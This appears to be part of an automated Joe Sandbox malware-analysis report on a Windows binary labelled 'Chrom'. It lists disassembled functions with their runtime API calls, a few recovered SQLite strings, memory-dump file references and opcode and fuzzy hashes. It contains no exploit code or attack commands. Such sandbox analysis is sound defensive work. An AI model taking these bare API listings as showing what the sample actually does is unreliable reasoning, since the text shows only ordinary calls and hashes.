                                                                                                                                                        Function 0040489A Relevance: 6.4, APIs: 5, Instructions: 110stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • strcpy.MSVCRT(?,00000000,00000000,00000000,?), ref: 004048BB
                                                                                                                                                        • memcmp.MSVCRT(?,?,00000010,00404E88,00000014,?,0000012F,0000011F,00000010,?,00000000,00000000,?), ref: 0040491E
                                                                                                                                                          • Part of subcall function 00404701: strlen.MSVCRT ref: 00404765
                                                                                                                                                          • Part of subcall function 00404701: memset.MSVCRT ref: 004047B1
                                                                                                                                                          • Part of subcall function 00404701: memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 004047C4
                                                                                                                                                          • Part of subcall function 00404701: memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 004047D7
                                                                                                                                                        • memcmp.MSVCRT(?,?,00000010,00404E88,00000014,0000011F,00000010,?,00000000,00000000,?), ref: 0040494C
                                                                                                                                                        • memset.MSVCRT ref: 0040496B
                                                                                                                                                        • memcpy.MSVCRT(-00000244,?,00000018,00000001,00000268,00000368,00000020,?,?,?,?,00000000,00000000,?), ref: 004049CB
                                                                                                                                                          • Part of subcall function 004045A7: strlen.MSVCRT ref: 00404601
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$memcmpmemsetstrlen$strcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1095719737-0
                                                                                                                                                        • Opcode ID: 74240cb5f961abd085359b0634ca8e8dff2a69e9ecdb28326ef061e22fa89259
                                                                                                                                                        • Instruction ID: 9ce700d3882f5f923fbb2479c9cfede1bda771696aaf60353e7394d058dfcfd5
                                                                                                                                                        • Opcode Fuzzy Hash: 74240cb5f961abd085359b0634ca8e8dff2a69e9ecdb28326ef061e22fa89259
                                                                                                                                                        • Instruction Fuzzy Hash: 693165B190070DBEEB20DAB0CC45EDFB7BCEB49304F00443AE655A6181E776AA498B65
                                                                                                                                                        Function 0041F7EB Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041F7FE
                                                                                                                                                        • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041F814
                                                                                                                                                        • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041F823
                                                                                                                                                        • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041F86B
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041F886
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$memcmp
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3384217055-0
                                                                                                                                                        • Opcode ID: 37284c2f66642d2ddd48264b57aea92c17a23a416b39e5917ac6500f9f335e0f
                                                                                                                                                        • Instruction ID: eba548dffeb7cbb86d277e9e8be7ea604d675ef8a9d9add480594eb241d03b37
                                                                                                                                                        • Opcode Fuzzy Hash: 37284c2f66642d2ddd48264b57aea92c17a23a416b39e5917ac6500f9f335e0f
                                                                                                                                                        • Instruction Fuzzy Hash: 9D217F76E10208ABDB14EBA6D841EDF73ECAF44704F14482AF516D7181EB38E649C665
                                                                                                                                                        Function 00412577 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$memcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 368790112-0
                                                                                                                                                        • Opcode ID: 080f722c0ffb7d8c385f632dd20dccb4c50922f07ff88e280dd473830913b811
                                                                                                                                                        • Instruction ID: a4c7653764e20342dfd6e83a4be63b5372cd9455a0b84470ab9be2deaa940da2
                                                                                                                                                        • Opcode Fuzzy Hash: 080f722c0ffb7d8c385f632dd20dccb4c50922f07ff88e280dd473830913b811
                                                                                                                                                        • Instruction Fuzzy Hash: B30128B1A80B007AE3357B35CC43F6A73A4AB91714F010A1EF252966C2DBA8A244817E
                                                                                                                                                        Function 004108E2 Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004020E9: GetMenu.USER32(?), ref: 00402107
                                                                                                                                                          • Part of subcall function 004020E9: GetSubMenu.USER32(00000000), ref: 0040210E
                                                                                                                                                          • Part of subcall function 004020E9: EnableMenuItem.USER32(?,?,00000000), ref: 00402126
                                                                                                                                                          • Part of subcall function 00402130: SendMessageW.USER32(?,00000412,?,00000000), ref: 00402147
                                                                                                                                                          • Part of subcall function 00402130: SendMessageW.USER32(?,00000411,?,?), ref: 0040216B
                                                                                                                                                        • GetMenu.USER32(?), ref: 00410AD4
                                                                                                                                                        • GetSubMenu.USER32(00000000), ref: 00410AE1
                                                                                                                                                        • GetSubMenu.USER32(00000000), ref: 00410AE4
                                                                                                                                                        • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410AF0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1889144086-0
                                                                                                                                                        • Opcode ID: b29996890921790c89765a35e80ffc15c9887586477020220e0e376b9c9daa8c
                                                                                                                                                        • Instruction ID: 6d8cac7b40754edf87d272c1bfb0116240dcbcd3534315d38a6e00175b30c6d6
                                                                                                                                                        • Opcode Fuzzy Hash: b29996890921790c89765a35e80ffc15c9887586477020220e0e376b9c9daa8c
                                                                                                                                                        • Instruction Fuzzy Hash: FD518670A40304BBEB209B66CD4AF9FBBF9EB84704F10046DB245772E2C6B56D91D754
                                                                                                                                                        Function 00419F2C Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 0041A00F
                                                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 0041A03A
                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A061
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041A077
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1661045500-0
                                                                                                                                                        • Opcode ID: 4d39a1befb4b444ca1625393fd6a5d283320a0bed10b0f3eee81afd0bc35f62a
                                                                                                                                                        • Instruction ID: 44d3c2b2ec300ebaed5fc3dda4e0471611584753ac233c2b16f5379b4c7cc4bc
                                                                                                                                                        • Opcode Fuzzy Hash: 4d39a1befb4b444ca1625393fd6a5d283320a0bed10b0f3eee81afd0bc35f62a
                                                                                                                                                        • Instruction Fuzzy Hash: C4515A752053029FD724CF25C980AA7BBE5FF88305F10492EF88687651E734ED98CB9A
                                                                                                                                                        Function 00430AD1 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 132COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00417A12: memset.MSVCRT ref: 00417A2C
                                                                                                                                                        • memcpy.MSVCRT(?,?,?), ref: 00430BB9
                                                                                                                                                        Strings
                                                                                                                                                        • sqlite_altertab_%s, xrefs: 00430B8A
                                                                                                                                                        • Cannot add a column to a view, xrefs: 00430B26
                                                                                                                                                        • virtual tables may not be altered, xrefs: 00430B10
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpymemset
                                                                                                                                                        • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                        • API String ID: 1297977491-2063813899
                                                                                                                                                        • Opcode ID: 275910ba7e0f0c96ad37673a583fd695216ffdde9dc2204ffc985ed4bb567882
                                                                                                                                                        • Instruction ID: 72999ff3d0cfdfb5e9367ee4ed3faa0f46e6dce2196ea4cba2caab35ae0537ad
                                                                                                                                                        • Opcode Fuzzy Hash: 275910ba7e0f0c96ad37673a583fd695216ffdde9dc2204ffc985ed4bb567882
                                                                                                                                                        • Instruction Fuzzy Hash: 80418E71A00205EFCB08DF59C881A99B7F0FF08314F25966AE848AB352D779ED50CB88
                                                                                                                                                        Function 00406900 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00406947
                                                                                                                                                          • Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D621
                                                                                                                                                          • Part of subcall function 0040D5E2: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D6BA
                                                                                                                                                          • Part of subcall function 0040D5E2: memcpy.MSVCRT(00000000,00000002), ref: 0040D6FA
                                                                                                                                                          • Part of subcall function 0040D5E2: wcscpy.MSVCRT ref: 0040D663
                                                                                                                                                          • Part of subcall function 0040D5E2: wcslen.MSVCRT ref: 0040D681
                                                                                                                                                          • Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D68F
                                                                                                                                                          • Part of subcall function 0040AA19: memset.MSVCRT ref: 0040AA3A
                                                                                                                                                          • Part of subcall function 0040AA19: _snwprintf.MSVCRT ref: 0040AA6D
                                                                                                                                                          • Part of subcall function 0040AA19: wcslen.MSVCRT ref: 0040AA79
                                                                                                                                                          • Part of subcall function 0040AA19: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040AA91
                                                                                                                                                          • Part of subcall function 0040AA19: wcslen.MSVCRT ref: 0040AA9F
                                                                                                                                                          • Part of subcall function 0040AA19: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040AAB2
                                                                                                                                                          • Part of subcall function 0040A7D1: GetOpenFileNameW.COMDLG32(?), ref: 0040A81A
                                                                                                                                                          • Part of subcall function 0040A7D1: wcscpy.MSVCRT ref: 0040A828
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameOpenString_snwprintf
                                                                                                                                                        • String ID: *.*$dat$x=E
                                                                                                                                                        • API String ID: 3589925243-2636922731
                                                                                                                                                        • Opcode ID: 5b1c68347a222ffadd2cfbfa5b6b642c86afeb0b6d325ee6a9cca5e14e506a85
                                                                                                                                                        • Instruction ID: d7f72c37b5c0960b3a93de2d3de2f44bd36794eda0f7d1f606609bc45afe3b75
                                                                                                                                                        • Opcode Fuzzy Hash: 5b1c68347a222ffadd2cfbfa5b6b642c86afeb0b6d325ee6a9cca5e14e506a85
                                                                                                                                                        • Instruction Fuzzy Hash: DF418671A00205AFDB04FF61DD46A9E77B9FF00318F11C02BF906A71D1EB79A9958B84
                                                                                                                                                        Function 0041078D Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040E814: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,0041079D,?), ref: 0040E835
                                                                                                                                                          • Part of subcall function 0040E814: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,0041079D,?), ref: 0040E8FC
                                                                                                                                                        • wcslen.MSVCRT ref: 004107BB
                                                                                                                                                        • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 004107C7
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00410815
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00410826
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1549203181-0
                                                                                                                                                        • Opcode ID: 521bfcc9bad965401c26efa2b72ae5d9106d53d3b49f8bb5091054076f9510e0
                                                                                                                                                        • Instruction ID: be044668a024ec5caeb14a2b8b02c3aaa195db98e278daf5b9384581b1cfce75
                                                                                                                                                        • Opcode Fuzzy Hash: 521bfcc9bad965401c26efa2b72ae5d9106d53d3b49f8bb5091054076f9510e0
                                                                                                                                                        • Instruction Fuzzy Hash: 08418B31900308EFCB61EF5AC980AD9BBB4EF48315F1144AAEC15DB356D678DAC0CB99
                                                                                                                                                        Function 00414F42 Relevance: 6.1, APIs: 4, Instructions: 100timeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CoCreateGuid.OLE32(00000000,?,?), ref: 00414F68
                                                                                                                                                          • Part of subcall function 0040AD10: _snwprintf.MSVCRT ref: 0040AD6A
                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00414FB9
                                                                                                                                                        • free.MSVCRT ref: 00415030
                                                                                                                                                        • memcpy.MSVCRT(?,?,00001E38,?,?), ref: 00415063
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Time$CreateFileGuidSystem_snwprintffreememcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2968200804-0
                                                                                                                                                        • Opcode ID: 2f9ba14a2f8dc736bd715059495414ae64c87d84619f28dbac8dd1c6da2f391f
                                                                                                                                                        • Instruction ID: 25fc22cfe4b5cde183837428320e4c1379d013834ecb010c5ec9b74078343e2e
                                                                                                                                                        • Opcode Fuzzy Hash: 2f9ba14a2f8dc736bd715059495414ae64c87d84619f28dbac8dd1c6da2f391f
                                                                                                                                                        • Instruction Fuzzy Hash: 6E317A72D00619ABCF01EF55C8809DEB7B8AF88314F164276EC14FB241E738AE558BE5
                                                                                                                                                        Function 00411B65 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00411BA4
                                                                                                                                                          • Part of subcall function 0040A6D5: ShellExecuteW.SHELL32(?,open,?,0044F4CC,0044F4CC,00000005), ref: 0040A6EB
                                                                                                                                                        • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 00411C14
                                                                                                                                                        • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 00411C2E
                                                                                                                                                        • GetKeyState.USER32(00000010), ref: 00411C5A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3550944819-0
                                                                                                                                                        • Opcode ID: 110857cfc2ea4ecf3d2e2f0a099ce967012f78d6f618a689b674ba793c676c63
                                                                                                                                                        • Instruction ID: ebbdbb9de51bfb825555d7e990b9e0e06ff93dbce945c066a165325672d84fca
                                                                                                                                                        • Opcode Fuzzy Hash: 110857cfc2ea4ecf3d2e2f0a099ce967012f78d6f618a689b674ba793c676c63
                                                                                                                                                        • Instruction Fuzzy Hash: 1241D030640305DFDB309F25C888B9673B4AB50329F10857AEA699B2E2D778AD85CB58
                                                                                                                                                        Function 0040F041 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • free.MSVCRT ref: 0040F09A
                                                                                                                                                        • memcpy.MSVCRT(00000000,?,00000001,+>@,00000000,00001E38,?,?,?,00403E2B), ref: 0040F0AC
                                                                                                                                                        • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F0DF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$free
                                                                                                                                                        • String ID: +>@
                                                                                                                                                        • API String ID: 2888793982-4232063742
                                                                                                                                                        • Opcode ID: 80fa03900417df2a92a9176d47486ea1bc487edf58bdf5f2f086700b407fb3cc
                                                                                                                                                        • Instruction ID: a4b117dcc49df0d4677d1a1554444a6f58dddbe622eac26ef29304aa8a98fb1c
                                                                                                                                                        • Opcode Fuzzy Hash: 80fa03900417df2a92a9176d47486ea1bc487edf58bdf5f2f086700b407fb3cc
                                                                                                                                                        • Instruction Fuzzy Hash: 25219030A00605EFCB20EF29CA4185ABBF6FF44314720467EE852E3B92E735EE519B55
                                                                                                                                                        Function 004124D9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000040,00000001,0044F98C,?,?,00412D17,?,0044F98C), ref: 0041251C
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000040,00000001,0044F98C,?,?,00412D17,?,0044F98C), ref: 00412546
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000013,00000001,0044F98C,?,?,00412D17,?,0044F98C), ref: 0041256A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 3510742995-2766056989
                                                                                                                                                        • Opcode ID: 1a8ca5cada9ad0e9eb845eafeefd174272e9607b940f064bebe2dc7a1e42d05d
                                                                                                                                                        • Instruction ID: e394cabee66379c814482ce599a1792370699005e64803ab7b2efeceeecbd966
                                                                                                                                                        • Opcode Fuzzy Hash: 1a8ca5cada9ad0e9eb845eafeefd174272e9607b940f064bebe2dc7a1e42d05d
                                                                                                                                                        • Instruction Fuzzy Hash: B9113BB25003047FCB289F25D9C0CAA77AAFF50344701062EF906C6252E674DFA586E9
                                                                                                                                                        Function 0040B4F8 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401C27,?,?,?,?,00458788,0000000C), ref: 0040B52D
                                                                                                                                                        • memset.MSVCRT ref: 0040B53E
